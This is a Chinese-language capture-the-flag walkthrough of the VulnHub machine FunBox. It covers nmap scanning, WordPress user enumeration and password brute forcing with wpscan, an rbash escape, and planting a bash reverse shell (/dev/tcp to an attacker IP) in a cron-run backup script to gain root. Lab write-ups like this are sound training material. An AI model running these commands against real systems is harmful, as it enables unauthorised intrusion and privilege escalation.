发现目标主机
我们使用nmap扫描整个网段
sudo nmap 192.168.1.0/24
扫描端口
使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口
sudo nmap -A 192.168.1.14
使用IP访问时发现会跳转到funbox.fritz.box
域名,我们需要再hosts文件中加入映射关系才能正常访问
添加之后通过域名访问发现这是一个WordPress搭建的网站
我们先用wpscan扫描一下用户,得到admin和joe两个用户
sudo wpscan --url http://funbox.fritz.box/ --enumerate u
我们创建一个用户字典然后进行密码爆破
sudo wpscan --url http://funbox.fritz.box/ -U ~/Desktop/VulnHub/FunBox/username -P /usr/share/wordlists/rockyou.txt
得到密码之后,由于服务器开放了22端口,我们先连接服务器试试
ssh joe@192.168.1.14
我们发现joe用户可以成功连接到服务器
但是,当我们想切换到其他目录的时候,发现这是一个受限的rbash
使用bash -i
即可绕过限制
我们查看joe家目录下的mbox文件发现了一句提示语,在funny的家目录下有一个备份脚本,让我们告诉他完成了。
Hi Joe, please tell funny the backupscript is done.
进入funny的家目录我们发现本脚本是一个隐藏文件
查看脚本内容即是将var/www/html备份到funny的家目录下
查看了一下时间发现文件最后修改时间和现在时间进行对比,这应该是一个定时执行的脚本
通过观察脚本差不多2-5分钟执行一次,我们在脚本里写入一个反弹shell
bash -i >& /dev/tcp/192.168.1.6/1234 0>&1
等几分钟即可返回一个shell
通过观察funny权限脚本1分钟执行一次,root权限5分钟执行一次,所以如果返回的不是root权限可以多试几次
查看Flag
福利来啦
加入我的星球
下方查看历史文章
扫描二维码
获取更多精彩
NowSec